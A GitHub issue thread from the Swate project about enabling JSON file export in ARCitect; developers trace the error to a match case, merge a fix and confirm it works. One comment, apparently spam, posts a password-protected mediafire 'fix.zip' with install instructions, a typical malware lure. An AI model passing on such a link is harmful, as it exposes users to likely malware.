### ISSUE TITLE
[Feature Request]: Enable Json Export in ARCitect

### ISSUE THREAD

**Issue by HLWeil** [nfdi4plants/Swate#515]
### Contact Details

@frsommer

### Is your feature request related to a problem?

Using the fileexport feature in ARCitect
![image](https://github.com/user-attachments/assets/0323f8a6-9852-4956-a9f9-3858d50fea20)
currently always results in the following error:
![image](https://github.com/user-attachments/assets/d6d0e133-f394-4c39-8e58-7cb768beb4ed)

In Swate-alpha, it works.

### Describe the solution you would like!

I would like to use this feature in ARCitect too!

### Additional context!

The error message comes from [this](https://github.com/nfdi4plants/Swate/blob/6552d762ffc9f4401fa2e38bc2f0f18312e1754b/src/Client/Update/InterfaceUpdate.fs#L252C27-L252C34) code-block, where only the `Browser` match case opens the file-download menu. Is there a reason this wouldn't work in ARCitect too?

@Etschbeijer @JonasLukasczyk 

### Host

ARCitect

### Host Details

ARCitect v0.0.41

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HLWeil** [comment]
Hey @ZiQiangZhou, 
did you mix up the repositories when commenting?

**Comment by Freymaurer** [comment]
This is a Swate issue and can be found in Client InterfaceUpdate.fs @HLWeil 

![image](https://github.com/user-attachments/assets/e22c7ba8-260b-4e0b-ab2b-e885fc486765)

**Comment by HLWeil** [comment]
Hey @Freymaurer, yes I already linked the code block which causes the error. My question is, what would happen if I just add ARCitect to the matchcase, like so:
<img width="510" alt="image" src="https://github.com/user-attachments/assets/2da6fcc0-49d2-4857-b727-f3f0b19dbe8f">

Or does ARCItect need its own implementation of the export handling?

**Comment by Freymaurer** [comment]
That should be perfectly fine

**Comment by kMutagene** [comment]
As #516 is merged, can this be closed @HLWeil ?

**Comment by HLWeil** [comment]
Yes, Swate had to be released in order for it to be tested out in ARCitect. And it works now!
